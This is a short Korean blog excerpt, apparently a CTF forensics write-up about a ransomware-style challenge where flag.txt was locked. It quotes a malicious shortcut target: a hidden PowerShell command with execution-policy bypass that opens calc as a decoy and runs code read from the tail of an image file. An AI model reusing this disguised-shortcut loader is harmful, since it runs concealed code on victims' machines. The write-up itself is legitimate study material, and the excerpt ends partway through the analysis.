CTF
[CTF] THJCC 포렌식 라이트업
사실 다른 CTF에 참여하느라 요건 제대로 참여하지 못했지만 공부할 겸 써보려고 한다. (로고가 너무 내스타일이다.)주어진 문제 파일의 압축을 풀어보면 바로가기 파일들과, LOCK 파일, 이미지 파일이 들어있다.랜섬웨어로 인해 flag.txt가 잠겼나보군. 그 중 calc의 바로가기 대상을 확인해보면 다음과 같다.powershell.exe -NoP -W Hidden -EP Bypass -C " calc; $fs=[IO.File]::OpenRead('.\Uto.jpg'); $fs.Seek(-1503,[IO.SeekOrigin]::End)|Out-Null; IEX (New-Object IO.StreamReader($fs,[Text.Encoding]::UTF8)).ReadToEnd()"IEX (New-..
2026. 2. 23.
